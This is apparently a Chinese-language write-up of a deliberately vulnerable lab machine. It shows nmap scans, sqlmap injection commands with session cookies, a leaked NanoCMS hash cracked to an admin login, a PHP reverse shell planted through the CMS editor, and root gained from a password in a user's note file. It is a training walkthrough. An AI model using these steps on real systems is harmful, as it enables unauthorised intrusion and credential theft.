不喜欢这关,这关太怪了
常规的端口扫描和主机发现
nmap -sP 192.168.181.0/24
nmap -p 1-65535 -A 192.168.181.151
查看80端口
目录扫描
把可疑的文件都看一看,比如list,mail之类的
先看看list
有输入框就有可能存在sql注入漏洞,手工探测一下,输个单引号看看
果然有
sqlmap注入
sqlmap -u "http://192.168.181.151/list/" --level=5 --risk=3 --cookie="PHPSESSID=qgkr1p0r63kamvm57rikrpjbv2; SESS0cb31c2d501edfbab86442571b9718e7=sv07a8fcnk3s16f9c19r11g110; SQMSESSID=tc6fq9ijufuf3g0htpioiacou2" --data="name=a&email=&phone=&org="
sqlmap -u "http://192.168.181.151/list/" --level=5 --risk=3 --cookie="PHPSESSID=qgkr1p0r63kamvm57rikrpjbv2; SESS0cb31c2d501edfbab86442571b9718e7=sv07a8fcnk3s16f9c19r11g110; SQMSESSID=tc6fq9ijufuf3g0htpioiacou2" --data="name=a&email=&phone=&org=" --dbs
到此为止了,后面啥都扫不出来,换个突破口吧
这个网站记录有NanoCMS的漏洞,密码哈希值泄露(为啥我不喜欢这个靶场,这个漏洞好难找啊到处都没有记录,还是看别人的过关记录才知道的这个漏洞的存在)
最后一行,有一个admin账户的密码哈希值,32位,应该是MD5
shannon
http://192.168.181.151/~andy/data/nanoadmin.php
登陆 admin
点击pages&options 选项,里面有两个php文件可以修改,刚好可以解释php语言,写入反弹shell
msf开启监听
访问修改后的url,反弹shell连接成功,顺便整个回显
sudo -l 和find提权都不行
查看/etc/passwd等等敏感文件也没啥有用信息
找了大半天,终于发现了点好东西
cd /home
ls
cd patrick
ls -a
cat .tomboy.log 查看日志文件
发现有人写入了root密码,还保存了notes
.tomboy目录下有几个note文件,都看看
cd .tomboy
ls
cat 481bca0d-7206-45dd-a459-a72ea1131329.note
发现密码了 50$cent
su root
提权成功
o了 😃